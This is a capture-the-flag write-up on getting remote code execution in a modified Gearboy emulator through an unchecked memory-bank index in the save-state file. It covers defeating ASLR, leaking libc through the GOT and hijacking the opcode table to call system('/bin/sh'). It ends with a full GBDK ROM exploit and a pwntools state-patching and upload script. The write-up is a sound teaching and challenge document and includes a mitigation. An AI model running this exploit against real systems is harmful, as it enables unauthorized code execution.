summaryrefslogtreecommitdiffstats
path: root/writeup/document.md
blob: ea19b69088e9dc04406243853062b97aa17f6016 (plain) (blame)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
---
documentclass: extarticle
geometry: margin=2cm
title: Gearboy Writeup
author: sinitax
fontsize: 12pt
---

## Exploit

The task is to gain remote code execution (atleast to the point of
reading the contents of the flag file) by manipulating only a gameboy
rom and state file which will be run on the server using a modified,
headless version of [*Gearboy*](https://github.com/drhelius/Gearboy),
a gameboy emulator.

My immediate suspicions were with missing checks for the state file and
not the ROM, because the state can be saved at any time and its
generally easier to forget checks before every use instead of once upon
loading the ROM.

By inspecting the source code for `GearboyCore::LoadState` we find the
functionality for the emulator split into many different classes and
a LoadState for each, e.g. `Processor::LoadState` and `Memory::LoadState`.

`Memory::LoadState` loads among other things various memory bank buffers
as well as values which control which of those banks are selected. Since
the address space of the gameboy is limited (16-bit address space), parts
of the memory must be swapped out to facilitate access to larger amounts.
Often times and index is used to indicate which memory bank is in use,
as is the case with `WRAM1`:

```
u8* Memory::GetWRAM1()
{
    return m_bCGB ? m_pWRAMBanks + (0x1000 * m_iCurrentWRAMBank) : m_pMap + 0xD000;
}
```

As long as `m_bCGB` (a flag enabling gameboy color mode) is set, the
backing buffer of `WRAM1` will be chosen from a bank in `m_pWRAMBanks`.
The value of `m_bCGB` is controlled by special purpose bytes in the
ROM which we can control.

Since `m_iCurrentWRAMBank` is loaded as part of the state and its value
is not properly sanitized, modifying this value in the state file allows us to
essentially mmap an arbitrary piece of memory into the address space of our
emulated game. When the running ROM writes and reads to `0xD000-0xE000`,
it will instead access the address we control.

But where to write when ASLR's enabled?

To get around ASLR we need to find objects on the heap with consistent
offsets to the `WRAM` bank buffer `m_pWRAMBanks`. We can do this by
running `gdbserver` in the docker container and observing the surrounding
memory and pointers of objects allocated closely before or after. The
fact that each session is a freshly spawned docker container helps
with consistency.

Doing this we find a heap configuration which is consistent on every first
run in the docker container: the address of the `Processor` object is
at an offset of `-0x126a0` from `m_pWRAMBanks` and the `Memory` object
is at an offset of `-0xd0` from the `Processor` object. By setting the
`m_iCurrentWRAMBank` value to `-0x13` in the state file we will be able
to access the `Processor` object at `0x13000-0x126a0+0xD000=0xD960`
and the `Memory` object at `0x13000-0x125d0+0xD000=0xD890`.

For every instruction, the processor resolves the function for handling
an opcode by looking it up in a table using the opcode as an index. This
`opcodeTable` is a member of the `Processor` object and as such stored
on the heap. By reading one of these function pointers and subtracting
its offset in the binary we can recover the base address at which the
gearboy emulator is loaded.

Now that we know the base address and as a result the address of the
GOT, regularly the next natural step is to leak libc by reading the got,
calculate the address of system and overwrite a function pointer
to call system. The only problem is, we are still just a ROM in
an emulator and only have access to the memory mapped into `0xD000-0xE000`.

We need to look for another access primitive.

This time, however, we are not limited to our state and rom file contents.
We can manipulate the `Memory` and `Processor` objects directly!

Looking through the source code again we find a good candidate:

```
u8* Memory::GetVRAM()
{
    if (m_bCGB)
        return (m_iCurrentLCDRAMBank == 1) ? m_pLCDRAMBank1 : m_pMap + 0x8000;
    else
        return m_pMap + 0x8000;
}
```

We have already set `m_bCGB` and `m_iCurrentLCDRAMBank` is loaded from the
state file. As such, we can make access to `0x8000-0x9000` backed by the
`m_pLCDRAMBank1` buffer, whose pointer we control.

We set `m_pLCDRAMBank1` in the `Memory` object to point to the target got
address of `free` which is calculated using the base address. We can then
read the `free` address from `0x8000`, leak the libc base and calculate
the `system` address.

To finally call system, we overwrite a function pointer in
`Processor::opcodeTable` and call the corresponding opcode.
We ensure the first argument to `system` points to the string **/bin/sh**
by writing it to the address of the `Processor` object, as this is the address
in `rdi` when `system` is called. Since `opcodeTable` is the first
member in `Processor` we need to choose an opcode to call which does
not conflict with the space used for the string and also is not called
before the value can be fully written (as is the case with the load
instructions). The `stop` instruction (value `0x10`) is a good fit here.

### Mitigation

This attack can be mitigated by performing better input sanitization
when loading values from the state file. This would have prevented the
initial read / write out-of-bounds and as such the subsequent RCE.
This can be implemented for `m_iCurrentWRAMBank` as a simple range check.

\newpage

**ROM Code (compiled using GBDK):**\footnote{https://github.com/gbdk-2020/gbdk-2020/}

```C
#include "stdint.h"
#include "string.h"

void
main(void)
{
	volatile static uint8_t *processor_gb;
	volatile static uint8_t *memory_gb;
	volatile static uint8_t *free_got_gb;
	volatile static uint64_t op0x00;
	volatile static uint64_t base;
	volatile static uint64_t libc;
	volatile static uint64_t free_got;
	volatile static uint64_t target;

	/* WRAM BANK = -0x13 */
	processor_gb = (void*) 0xD960;
	memory_gb = processor_gb - 0xd0;

	/* get base from op0x00 */
	op0x00 = *(uint64_t*)processor_gb;
	base = op0x00 - 0x1d420;
	free_got = base + 0x4ad78;

	/* change lcdrambank pointer to access got */
	*(uint64_t*)(memory_gb+0x90) = free_got;
	free_got_gb = (void*) 0x8000;

	libc = (*(uint64_t*)free_got_gb) - 0x9a6d0;

	target = libc + 0x52290;
	strcpy((char*)processor_gb, "/bin/sh");
	*(uint64_t*)(processor_gb+0x10*0x10) = target;

	__asm \
		stop \
	__endasm;

	while (1);
}
```

\newpage

**Upload and state modification script:**

```python
from base64 import b64encode
from sys import argv,exit
from pwn import *

rom = list(open("main.gb", "rb").read())
state = list(open("main.state", "rb").read())

# set m_iCurrentWRAMBank
for i,v in enumerate(struct.pack("<i", -0x13)):
    state[0x10000+i] = v

# set m_iCurrentLCDRAMBank
for i,v in enumerate(struct.pack("<i", 1)):
    state[0x10004+i] = v

io = process(argv[1:])

io.sendline(b64encode(bytes(rom)))
io.sendline(b64encode(bytes(state)))

io.interactive()
```